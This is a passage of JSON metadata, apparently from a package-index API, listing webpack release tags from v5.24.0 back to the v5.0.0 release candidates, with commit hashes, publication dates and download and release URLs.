itHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f